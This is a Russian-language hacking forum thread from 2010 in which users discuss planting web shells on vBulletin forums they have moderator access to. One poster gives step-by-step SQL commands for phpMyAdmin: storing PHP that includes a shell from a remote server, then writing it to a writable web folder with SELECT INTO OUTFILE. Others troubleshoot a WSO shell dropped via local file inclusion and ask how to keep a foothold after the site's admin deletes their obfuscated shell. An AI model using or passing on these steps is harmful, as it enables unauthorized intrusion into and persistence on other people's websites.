Что еще объяснять? Есть аккаунты модератора на двух форумах- vbulletin 4.0.2 и vbulletin 3.8.5. Нужно залить шелл. Старые баги с заливкой через предупреждения и репутацию- не работают.
Есть залитый через локальный инклуд шелл на сервере (WSO 2.4), при попытке просмотреть исходный код файлов, либо содержимое папок, а так же при нажатии на какие либо кнопки, выкидывает на главную страницу сайта, safe mod - off. Что это может быть?
Последний раз редактировалось Redwood; 28.03.2010 в 22:33..
Есть залитый через локальный инклуд шелл на сервере (WSO 2.4), при попытке просмотреть исходный код файлов, либо содержимое папок, а так же при нажатии на какие либо кнопки, выкидывает на главную страницу сайта, safe mod - off. Что это может быть?
а у меня такой вопрос как залить шелл через phpmyadmin желательно подробно...
Cоздаем таблицу, например 'hack' с колонкой 'shell'
CREATE TABLE 'hack' ('shell' TEXT);
Записываем в базу скрипт который должен инклудить шелл с сервера
INSERT INTO 'hack' ('shell') VALUES ('<? include 'http://сервер с шеллом' ?>');
Ищем папку с правами на запись uploads,images,etc.
Подставляем путь в запрос: SELECT shell FROM 'hack' INTO OUTFILE '/home/сайт/www/uploads/shell.php';
Последний раз редактировалось Redwood; 29.03.2010 в 04:00..
ну да, но меня интересовало как залить шелл именно через phpmyadmin.
спсасибо но я уже разобрался просто ты похоже описал как залить шелл через сиквел инжекцию...
кстати единственное с чем возникла трудность при заливке так это синтаксис
select * from 'table' into outfile 'путь' -не правильно
select * from `table` into outfile 'путь' -так правильно
а весь прикол в кавычках оказалсо
ппц. я в шоке ну и админ попался 4 раз шелл лью а он его удаляет!!! при всем том что код обфусцирован... и сам файл я вроде переименовывал,прятал...
как можно по другому остатся в системе?
Последний раз редактировалось 547; 29.03.2010 в 02:05..